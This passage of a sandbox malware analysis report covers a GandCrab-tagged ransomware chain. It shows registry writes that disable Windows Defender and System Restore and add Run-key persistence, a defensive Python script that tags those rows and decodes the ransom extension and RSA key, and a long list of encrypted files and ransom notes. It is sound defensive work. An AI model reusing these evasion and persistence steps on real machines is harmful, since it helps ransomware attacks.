2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data | public | 0602000000A40000525341310008000001000100DF2BA59D8757A4C3723EE6E3EF8AE08DFBDA63419C548702CD95810F02DF3BFBA92ECAB17CD52C49775F35132D0ADCF9807126955D3CD390A4746B955311055A6DE2C841D3EE91745B84407E0CE48AE6631B5055B040F2F4A4F4974508355502DCFC056BA0AE9DB6129162A5A3DD779491E148C81D4592851B61C58D2545DC872A9729B4E2DA3239989A3C19CF4D866E5D2717FA212E6B0AF1275FD339B933ED30CEA21457A5ECB3FB9B2E93A07233499195EF4156BF6D9F5045EA186EA0435DDD3E32F3954F2014E83AE921C0AD004F2C029BD5401E1EDABCEA53DB0174E508141118B0D060CD789C6F8C42FE4FC500BA111FC5A6D37AB7D2EE527A62C30187
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data | private | (value elided)
2180 | 3468116065.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0
2180 | 3468116065.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32 | EnableFileTracing | 0
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32 | EnableConsoleTracing | 0
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32 | FileTracingMask | 4294901760
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32 | ConsoleTracingMask | 4294901760
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32 | MaxFileSize | 1048576
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32 | FileDirectory | %windir%\tracing
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS | EnableFileTracing | 0
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS | EnableConsoleTracing | 0
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS | FileTracingMask | 4294901760
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS | ConsoleTracingMask | 4294901760
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS | MaxFileSize | 1048576
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS | FileDirectory | %windir%\tracing
2180 | 3468116065.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
2180 | 3468116065.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | (value elided)
2180 | 3468116065.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E | LanguageList | en-US
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | Blob | (value elided)
2180 | 3468116065.exe | delete key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | |
2180 | 3468116065.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | Blob | (value elided)
2180 | 3468116065.exe | delete key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | |
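
Most rows in the table above are noise: the Tracing\<image>_RASAPI32 and _RASMANCS keys and the Internet Settings\ZoneMap values are written by the RAS and WinINet libraries in any process that loads them (powershell.exe writes the same set here), and the WinRAR rows are the analyst opening the archive. The rows that matter are the Run values pointing into the user profile, the Windows Defender Real-time Protection policy values, the Security Center overrides, DisableSR, and the two values the gandcrab-tagged sample writes under HKLM\SOFTWARE\ex_data\data and HKLM\SOFTWARE\keys_data\data. The following is an added example, not ANY.RUN's code, that tags those rows and decodes the two sample-specific values: ext is a NUL-terminated UTF-16LE string, and public has the layout of a CryptoAPI PUBLICKEYBLOB (BLOBHEADER, RSAPUBKEY, then the little-endian modulus), which the parser checks against the blob's own magic before trusting it. The event subset, the tactic labels and the PKCS#1 export are this example's own choices; every hex value is copied from the table.

```python
"""Triage of the registry writes in the table above (added example, not ANY.RUN code)."""
import base64
import struct
from typing import Dict, List, Tuple

# HKLM\SOFTWARE\keys_data\data\public, exactly as recorded in the table (552 hex digits).
PUBLIC_BLOB_HEX = (
    "0602000000A40000525341310008000001000100"
    "DF2BA59D8757A4C3723EE6E3EF8AE08DFBDA63419C548702CD95810F02DF3BFB"
    "A92ECAB17CD52C49775F35132D0ADCF9807126955D3CD390A4746B955311055A"
    "6DE2C841D3EE91745B84407E0CE48AE6631B5055B040F2F4A4F4974508355502"
    "DCFC056BA0AE9DB6129162A5A3DD779491E148C81D4592851B61C58D2545DC87"
    "2A9729B4E2DA3239989A3C19CF4D866E5D2717FA212E6B0AF1275FD339B933ED"
    "30CEA21457A5ECB3FB9B2E93A07233499195EF4156BF6D9F5045EA186EA0435D"
    "DD3E32F3954F2014E83AE921C0AD004F2C029BD5401E1EDABCEA53DB0174E508"
    "141118B0D060CD789C6F8C42FE4FC500BA111FC5A6D37AB7D2EE527A62C30187"
)

# Constructed subset of the table: (pid, process, key, name, value), values copied verbatim.
EVENTS = [
    (3676, "3875839546.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "WinCfgMgr", r"C:\Users\admin\4950606094303050\wincfg32svc.exe"),
    (3844, "979574639568794.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Microsoft Windows Services", r"C:\Users\admin\495030305060\winsvcs.exe"),
    (2928, "winsvcs.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection", "DisableBehaviorMonitoring", "1"),
    (2928, "winsvcs.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center", "AntiVirusOverride", "1"),
    (2928, "winsvcs.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore", "DisableSR", "1"),
    (2648, "winsvcs.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\winsvcs_RASAPI32", "EnableFileTracing", "0"),
    (2180, "3468116065.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data", "ext", "2E007A0068007300710076007A000000"),
    (2180, "3468116065.exe", r"HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data", "public", PUBLIC_BLOB_HEX),
]


def decode_ext(hexvalue: str) -> str:
    """REG_BINARY holding a NUL-terminated UTF-16LE string: '2E007A00...' -> '.zhsqvz'."""
    return bytes.fromhex(hexvalue).decode("utf-16-le").rstrip("\x00")


def parse_capi_rsa_pubkey(hexblob: str) -> Dict[str, int]:
    """BLOBHEADER (bType, bVersion, reserved, aiKeyAlg) + RSAPUBKEY (magic, bitlen, pubexp) + modulus."""
    raw = bytes.fromhex(hexblob)
    btype, version, _reserved, alg_id = struct.unpack_from("<BBHI", raw, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", raw, 8)
    if btype != 0x06 or version != 0x02 or magic != b"RSA1":  # PUBLICKEYBLOB, CUR_BLOB_VERSION, RSA1
        raise ValueError("not a CryptoAPI RSA public key blob")
    nbytes = bitlen // 8
    if len(raw) != 20 + nbytes:
        raise ValueError(f"expected {20 + nbytes} bytes for a {bitlen}-bit key, got {len(raw)}")
    # The modulus is stored little-endian, unlike every ASN.1 encoding of it.
    return {"alg_id": alg_id, "bits": bitlen, "e": pubexp, "n": int.from_bytes(raw[20:20 + nbytes], "little")}


def _der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    size = (n.bit_length() + 7) // 8
    return bytes([0x80 | size]) + n.to_bytes(size, "big")


def _der_uint(v: int) -> bytes:
    body = v.to_bytes((v.bit_length() + 7) // 8, "big")
    if body[0] & 0x80:
        body = b"\x00" + body  # leading zero keeps the INTEGER positive
    return b"\x02" + _der_len(len(body)) + body


def to_pkcs1_der(n: int, e: int) -> bytes:
    """RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER } (RFC 8017)."""
    body = _der_uint(n) + _der_uint(e)
    return b"\x30" + _der_len(len(body)) + body


def to_pkcs1_pem(n: int, e: int) -> str:
    """PEM wrapping of the PKCS#1 structure, 64 characters per line."""
    b64 = base64.b64encode(to_pkcs1_der(n, e)).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN RSA PUBLIC KEY-----\n" + "\n".join(lines) + "\n-----END RSA PUBLIC KEY-----\n"


def triage(events) -> List[Tuple[int, str, str]]:
    """Tag the writes that carry signal; Tracing and ZoneMap rows fall through untagged on purpose."""
    findings: List[Tuple[int, str, str]] = []
    for pid, _proc, key, name, value in events:
        k = key.lower()
        if k.endswith("\\currentversion\\run") and value.lower().startswith("c:\\users\\"):
            findings.append((pid, "persistence", f"Run value '{name}' points into a user profile: {value}"))
        elif "\\policies\\microsoft\\windows defender\\" in k and value == "1":
            findings.append((pid, "defense evasion", f"Defender policy {name}=1"))
        elif k.endswith("\\microsoft\\security center") and value == "1":
            findings.append((pid, "defense evasion", f"Security Center {name}=1 suppresses Action Center alerts"))
        elif k.endswith("\\systemrestore") and name == "DisableSR" and value == "1":
            findings.append((pid, "impact", "System Restore disabled"))
        elif k.endswith("\\software\\ex_data\\data") and name == "ext":
            findings.append((pid, "ransomware config", f"encrypted-file extension {decode_ext(value)}"))
        elif k.endswith("\\software\\keys_data\\data") and name == "public":
            info = parse_capi_rsa_pubkey(value)
            findings.append((pid, "ransomware config", f"RSA-{info['bits']} public key, e={info['e']}"))
    return findings
```

Running `triage(EVENTS)` yields seven findings and drops the Tracing row; `decode_ext` recovers `.zhsqvz`, the extension appended to every encrypted file in the Files activity section below, and `parse_capi_rsa_pubkey` reports aiKeyAlg 0xA400 (CALG_RSA_KEYX), a 2048-bit modulus and e = 65537. `to_pkcs1_pem` writes the key in a form `openssl rsa -RSAPublicKey_in -in key.pem -text -noout` will display, which is the quickest way to compare it against keys recovered from other infected hosts. The table also shows a `private` value written beside `public` under keys_data\data; its contents are elided in this copy of the report, so nothing here decodes it.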

Files activity

Executable files
14
Suspicious files
280
Text files
210
Unknown types
8

Dropped files

PID Process Filename Type
3784 powershell.exe C:\Users\admin\AppData\Local\Temp\979574639568794.exe executable
2928 winsvcs.exe C:\Users\admin\AppData\Local\Temp\1958842343.exe executable
3736 2746537711.exe C:\Users\admin\657607470096780\winsvcs.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3875839546.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\2[1].exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[2].exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\2746537711.exe executable
2928 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3088011411.exe executable
3844 979574639568794.exe C:\Users\admin\495030305060\winsvcs.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3358028963.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3468116065.exe executable
3676 3875839546.exe C:\Users\admin\4950606094303050\wincfg32svc.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3782739527.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[1].exe executable
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3.zhsqvz ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3 ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3.zhsqvz ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3 ––
2180 3468116065.exe C:\Users\Public\Libraries\RecordedTV.library-ms.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Music\Sample Music\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Libraries\RecordedTV.library-ms ––
2180 3468116065.exe C:\Users\Public\Libraries\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Music\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Pictures\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Videos\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Downloads\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Favorites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Documents\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms ––
2180 3468116065.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Pictures\senseshot.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Searches\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Saved Games\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Pictures\senseshot.jpg ––
2180 3468116065.exe C:\Users\admin\Pictures\programsmarch.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\mountainpresented.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\programsmarch.jpg ––
2180 3468116065.exe C:\Users\admin\Pictures\mountainpresented.jpg ––
2180 3468116065.exe C:\Users\admin\Pictures\farupon.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\healththroughout.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\farupon.png ––
2180 3468116065.exe C:\Users\admin\Pictures\healththroughout.jpg ––
2180 3468116065.exe C:\Users\admin\ntuser.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\everyoneebay.jpg.zhsqvz fli
2180 3468116065.exe C:\Users\admin\ntuser.ini ––
2180 3468116065.exe C:\Users\admin\Pictures\everyoneebay.jpg ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.zhsqvz bs
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Links\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links\Suggested Sites.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links\Suggested Sites.url ––
2180 3468116065.exe C:\Users\admin\Favorites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Downloads\tvcomputers.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Downloads\tvcomputers.jpg ––
2180 3468116065.exe C:\Users\admin\Downloads\nudedecember.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\paypalbenefit.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\nudedecember.jpg ––
2180 3468116065.exe C:\Users\admin\Downloads\paypalbenefit.png ––
2180 3468116065.exe C:\Users\admin\Downloads\mapsoperating.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\hereglobal.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\hereglobal.jpg ––
2180 3468116065.exe C:\Users\admin\Downloads\mapsoperating.png ––
2180 3468116065.exe C:\Users\admin\Documents\weatherhardcore.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\xgreater.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\weatherhardcore.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\xgreater.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\tuesdaytue.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.zhsqvz vc
2180 3468116065.exe C:\Users\admin\Documents\tuesdaytue.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2 ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one ––
2180 3468116065.exe C:\Users\admin\Documents\iephone.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Videos\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Music\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Pictures\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\iephone.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\employeesupon.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\estwhile.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\estwhile.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\employeesupon.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\beensouth.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\beensouth.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Desktop\stocktoday.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\stocktoday.png ––
2180 3468116065.exe C:\Users\admin\Desktop\providesupplies.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\providesupplies.png ––
2180 3468116065.exe C:\Users\admin\Desktop\modelmonday.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\modelmonday.rtf ––
2180 3468116065.exe C:\Users\admin\Desktop\menhp.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\menhp.png ––
2180 3468116065.exe C:\Users\admin\Desktop\leadingspecific.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\leadingspecific.rtf ––
2180 3468116065.exe C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js ––
2180 3468116065.exe C:\Users\admin\Desktop\allsimple.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\coloradoproperty.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\coloradoproperty.rtf ––
2180 3468116065.exe C:\Users\admin\Desktop\allsimple.rtf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Desktop\albumturn.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Contacts\admin.contact.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\albumturn.rtf ––
2180 3468116065.exe C:\Users\admin\Contacts\admin.contact ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@www.pizcam[1].txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Contacts\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\WinRAR\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Sun\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Sun\Java\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db ––
